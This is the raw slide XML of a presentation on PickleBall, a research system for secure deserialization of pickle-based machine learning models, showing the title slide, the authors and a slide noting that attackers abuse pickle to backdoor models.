Target="../comments/comment6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/columbia/pickleball" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.5281/zenodo.16974644" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.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6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63.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.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64.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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65.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.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66.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.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67.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment7.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68.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69.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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7.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70.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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71.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.pn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72.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.pn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73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.pn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74.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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9.xml"/><Relationship Id="rId3"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7" name="Shape 277"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="977825"/>
            <a:ext cx="8520600" cy="1051200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>: Secure Deserialization of Pickle-based Machine Learning Models</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2668725"/>
            <a:ext cx="8520600" cy="1256100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Andreas D. Kellas</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, Neophytos Christou</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, Wenxin Jiang</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Penghui Li</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, Laurent Simon</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, Yaniv David</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Vasileios P. Kemerlis</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, James C. Davis</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>, Junfeng Yang</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="2000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr baseline="30000" sz="2000">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="4713892"/>
            <a:ext cx="548700" cy="3387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pic>
        <p:nvPicPr>
          <p:cNvPr id="281" name="Google Shape;281;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742963" y="3911783"/>
            <a:ext cx="1307075" cy="734550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="Google Shape;282;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193550" y="3961322"/>
            <a:ext cx="1089395" cy="612250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="283" name="Google Shape;283;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662475" y="4106355"/>
            <a:ext cx="1000459" cy="338700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="284" name="Google Shape;284;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210201" y="3973025"/>
            <a:ext cx="1307074" cy="588862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="931631" y="3999125"/>
            <a:ext cx="495732" cy="536626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729656" y="3785425"/>
            <a:ext cx="2967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rgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049350" y="3785425"/>
            <a:ext cx="2967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rgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649550" y="3785425"/>
            <a:ext cx="2967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rgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478350" y="3785425"/>
            <a:ext cx="2967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rgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957126" y="3785425"/>
            <a:ext cx="2967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rgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000D74"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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9" name="Shape 429"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p37"/>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431" name="Google Shape;431;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attackers Abuse Pickle-Based Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="3408600" cy="1693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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models are saved and loaded with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Attackers abuse the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> format to create backdoored models. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="433" name="Google Shape;433;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4229238" y="2874206"/>
            <a:ext cx="4171299" cy="1139325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="434" name="Google Shape;434;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4229250" y="929350"/>
            <a:ext cx="4171275" cy="1556525"/>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8" name="Shape 438"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
